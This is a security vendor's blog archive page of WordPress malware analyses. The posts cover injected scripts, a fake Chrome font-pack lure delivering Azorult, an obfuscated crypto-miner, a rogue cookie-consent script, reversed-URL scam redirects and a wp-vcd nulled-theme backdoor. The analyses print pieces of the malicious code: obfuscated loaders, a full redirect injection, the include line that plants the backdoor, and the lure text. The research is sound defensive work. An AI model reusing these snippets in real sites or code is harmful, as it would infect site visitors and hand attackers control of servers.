Malware Archives - Page 6 of 10

Multi-Vector WordPress Infection from Examhome

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js, .php files and the WordPress database.>

The script looks like this:

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101,...skipped... 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125))

If you decode it, it injects scripts from hxxps://ads.voipnewswire[.]net/ad.js and later hxxps://examhome[.]net/stat.js?v=1.0.2. Some other related URLs are hxxps://cdn.allyouwant[.]online/main.js?t=c and hxxps://mp3menu[.]org/mp3.js,/b>.

Sometimes links to such scripts may be injected into wp_posts tables without any obfuscation whatsoever, e.g.

<script src='hxxps://cdn.examhome[.]net/cdn.js?ver=1.0.5' type='text/javascript'></script>

Many different attack vectors are being used in this campaign. The location of the malware varies a lot. The more common versions of this malware can be found in .js files that have jquery in their names. Or they are injected into settings of vulnerable WordPress themes and plugins, for example, very old tagDiv themes (Newspaper, Newsmag and their derivatives) or unpatched Smart Google Code Inserter plugin.

Sep 18, 2018 by Denis Sinegubko

“Google Fonts” popup leads to malware

A recent malware injection in a client\'s WordPress file was found to be targeting website visitors that were using the Google Chrome browser to access the infected website. It uses Javascript to detect the visitor\'s use of Google Chrome and then upon the visitor clicking it generates a popup notification which falsely claims that the visitor\'s Google Chrome is missing the HoeflerText font and that it is preventing the website from loading correctly.

It then instructs the website visitor to click a button on the popup notification - which then ends with a serious Azorult malicious .exe being downloaded to the website visitor\'s machine. It looks like this specific Azorult malware family was recently updated and it seems to currently have a detection rate of under 50% for major anti-virus softwares.


The \"HoeflerText\" font wasn't found.

The web page you are trying to load is displayed incorrectly, as it uses the \"HoeflerText\" font. To fix the error and display the text, you have to update the \"Chrome Font Pack\".

Step 1: In the bottom left corner of the screen you'll see the download bar. Click on the Chrome_Font.exe item.
Step 2: Press Yes(Run) in order to see the correct content on the web page.

Manufacturer:   Google Inc. All Rights Reserved
Current version:    Chrome Font Pack 53.0.2785.89
Latest version: Chrome Font Pack 57.2.5284.21

Update

Sep 10, 2018 by Luke Leal

Obfuscated JavaScript Crypto Miner

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, Crypto Miners were ran on customers visiting the website.

By looking at the following malware this can be discouraging and frightening, but let’s review the malware code and see how the attacker cleverly created Crypto Miner code which was placed into the ./wp-content/themes/responsive/header.php file:

< script >$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")
[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")
[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+
($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")
[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)
[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_.
…...

The attacker placed the code at the top of a legit file. When the website is opened, it executed the JavaScript code and started mining Cryptocurrencies.

Let’s work through the malicious code step by step to see how it works.

The first step is to get the code to make more sense, so we are going to get it in a more readable format.

The malicious code was placed between the opening and closing JavaScript tags as indicated below:

< script >
    $ = ~[];
    $ = {
        ___: ++$,
        $$$$: (![] + "")[$],
        __$: ++$,
        $_$_: (![] + "")[$],
        _$_: ++$,
        $_$$: ({} + "")[$],
        $$_$: ($[$] + "")[$],
        _$$: ++$,
        $$$_: (!"" + "")[$],
        $__: ++$,
        $_$: ++$,
        $$__: ({} + "")[$],
        $$_: ++$,
        $$$: ++$,
        $___: ++$,
        $__$: ++$
    };
.....

Once the obfuscated malware has been decoded, it contained the following JavaScript code that will be used in the next phase of the Cryptocurrency.

If we look at the malicious code, we can see that the variable “el” contains a script object that will be pulling the final Crypto Miner payload from “web[.]clod[.]pw”

var el = document.createElement('script');el.src='https://web[.]clod[.]pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTN…….

In comparison, let’s look at the Crypto Miner payload that was pulled from “web[.]clod[.]pw” and see how it works.

This is a small piece of the malware that was pulled:

var _0xce82=['Y3VycmVudEpvYg==','WGZxVlU=','Z2V0VG90YWxIYXNoZXM=','dmxH','ZlBsVHA=','UmhsVEQ=','Tndoa0k=','RkhQZ2c=','Z2V0QWNjZXB0ZWRIYXNoZXM=','VXZV','WnZa','aHJjYWQ=','anB1cXI=','dGtMSkE=',
…...

Once we decode the content that was pulled from “web[.]clad[.]pw”, we see it contains many functions to check for crawlers and mobile devices and then decides whether it can start the Crypto miners:

if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop
|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i
|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.
(browser|link)|vodafone|wap|windows ce|xda|xiino/i [_0x2ce8('0x7d')](b) || 
/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|
as(te|us)|attw|au(di|\-m|r |s ….

After all the functions have been tested and verified, it will run the Cryptocurrency miner and execute the Crypto miner script by way of your computer hardware.The mining process will start mining Cryptocurrency for the hacker:

if (![]) {
    if (document[_0x2ce8('0xae')][_0x2ce8('0xaf')](/google|yandex|mail|vk.com|ask|bing/) || localStorage[_0x2ce8('0xb0')](_0x2ce8('0xab'))
 || sessionStorage && sessionStorage[_0x2ce8('0xb0')](_0x2ce8('0xab')))
 {
        localStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        sessionStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        runMiner();

    }
} else {
    runMiner();
}
if (document[_0x2ce8('0x1d3')]) {
    var node = document[_0x2ce8('0x1d3')](_0x2ce8('0x1cd'));
    if (node && node[_0x2ce8('0x1d5')]) {
        node[_0x2ce8('0x1d5')]();
    }
}

If you think your website is infected, you can always trust the engineers from Sucuri to check it and clean it for you by visiting and subscribing at https://sucuri.net.

Aug 1, 2018 by Samuel Odendaal

Cookie consent script used to distribute malware

Since the new website cookie usage regulations in the EU have come into place, many websites have added a warning on their website about how they use cookies on it and as well, ask for your consent.

This has caused many website owners to look for an easy way to implement this and we recently found one website which was using JavaScript from cookiescript[.]info to display this cookie consent request on their website. When visiting the website for the first time via Chrome, you would get a JavaScript alert saying: “Your computer is infected. You have to check it with antivirus.”

You can try to click Cancel or OK but in both cases you are going to get redirected to a website trying to convince you to buy antivirus software which could be malware. It looks like the website cookiescript.info is the one distributing this malware to unsuspecting users.

The malware we caught, attempted to load JavaScript from here:
cdn.front.to/libs/cookieconsent.min.4.js

That link just redirects to this URL:
hxxp://cdn[.]cookiescript[.]info/libs/cookiescript.min.js

Here is some of the code inside this JavaScript:

As you can see, it’s loading some additional JavaScript; this time it's “hxxp://cdn[.]cookiescript[.]info/libs/detect_ga.js”, and is the one responsible for detecting the user agent, attaching the cookie to your browser. Here is some of the code:

Finally, this code gets loaded. It has the alert message, along with the code responsible for the redirect to the malicious website selling you the antivirus software:

hxxp://jsserver[.]info/alert.php

You can see the code here:

The website cookiescript.info appears to be using Cloudflare to hide its IP addresses, and the domain is protected by WhoisGuard, so there is no easy way to say who owns this website. However, after some more digging, I was able to find some more details.

cookiescript[.]info. 86399 IN NS fred.ns.cloudflare.com.
cookiescript[.]info. 86399 IN NS mia.ns.cloudflare.com.

It appears that cookie-consent.org and front.to are also part of the same network. We also found some evidence which suggests that the malware has been operating for a few months already.

We highly recommend inspecting code before adding it to your website. It's always best for you to host the entire code on your own server instead of an external website which can be compromised or simply be owned by malicious users.

May 29, 2018 by Krasimir Konov

Reversed URLs Randomly Redirect to Scams

We are seeing hundreds of infected WordPress sites with the following scripts (in one line) injected in random places in wp_posts table.

$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

This code randomly (with probability of around 20%), after a timeout of 15 seconds, redirects visitors various scam sites (e.g. “Browser review to win an iPad” or “tech support” scams).

The redirect chains usually include domains like3cal1ingc0nstant3111212[.]tk, 3worthysupp0rt310121[.]tk, techsupport60512123456[.]tk, 2bestsupp0rt310121[.]tk, etc. (they change frequently)and balans.shahterworld[.]org

The very first redirect URL is hard-coded in the reversed form (we see this obfuscation trick quite often) inside the injected scripts. In the above case the redirect code decodes to this

document.location.href='hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php'

It’s is not the only redirect URL used in this campaign. We checked over 200 infected sites and found these 4 URLs – all of them on hacked sites themselves.

hxxp://emarketing-immobilier[.]com/wp-content/plugins/gotmls/safe-load/plugin-settings.phphxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.phphxxp://kodmax[.]com/wp-content/plugins/twitter-widget-pro/lib/class.widget.phphxxp://nh70putera[.]com/wp-content/plugins/login-lockdown/plugin-settings.php

As always, if you need a professional help to clean and protect your site, you can count on us.

Dec 14, 2017 by Denis Sinegubko

Using Google and Facebook to aid on distribution

Every now and then I check my spam mail box for interesting malware (yes, I receive a lot of phishing messages and alerts that my payments are overdue), but most of the time is more of the same, effortless malware, lousy written messages and not fun to analyze.

Today I was bored (that time of the year that you need to write tons of reports, sorry boss…) and I decided to follow the trail of some of those links on the messages I got. And the first one was a "pleasant" surprise.

Usually I'd go with checking the message origin and writing about how it was sent and what was used to get control of the site, but this time I'll write about other aspect. (If you are wondering, it is a WordPress site with a vulnerable revslider on the site's theme that allowed the attacker to have privileged access to the site).

For those not fluent in Brazilian Portuguese, this message is telling that I have a payment overdue and a new "boleto" (a common barcode payment method in Brazil) is attached. The interesting part is that they are referring to me by my personal email alias and not the full name, however they got my CPF (Brazil's Social Security Number) correct, probably it's is related to some leaked data (not that uncommon here).

Everything on this message is clickable and all them will send you to the same Google shortened URL. Which translates to the Facebook's fbsbx.com domain, which is used by Facebook as the domain where the attachments shared on chats and groups are stored.

It is pretty interesting that they are relying on such services to "host" their files instead of using another hacked site to store the malware. I monitored this file and although the link was set to expire on Fri, 22 Dec 2017 16:15:47 GMT, it was taken down less than 24h after I receive the email scam, probably by a Facebook malware scan process.

Dec 11, 2017 by Fioravante Souza

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about wp-vcd malware that created rogue WordPress admin users (100010010) and injected spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) had this very wp-vcd malware pre-installed with every downloaded theme.

It’s pretty easy to notice when you check the files inside the downloaded .zip files. All original files have one date, but two files have a different, more recent date:

12914 Dec  4 09:25 functions.php33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you’ll notice that functions.php has this line of code at the top

<?php if (file_exists(dirname(FILE) . '/class.theme-modules.php')) include_once(dirname(FILE) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file that is included by the code added in the functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest malicious files.

The beginning of the file looks like this

<?php //install_code1error_reporting(0);ini_set('display_errors', 0);DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']);$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code......

Providing “nulled” content with backdoors, spam and other types of malware is typical for sites that offer premium software “for free”. We warned against using nulled themes and plugins many times.

Cleaning sites with such malware may be not that easy as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin. And the backdoor it creates allows the bad guys to do almost anything with your site. That’s why a thorough site analysis and cleanup is required. Let us know if you need our help.

Dec 6, 2017 by Denis Sinegubko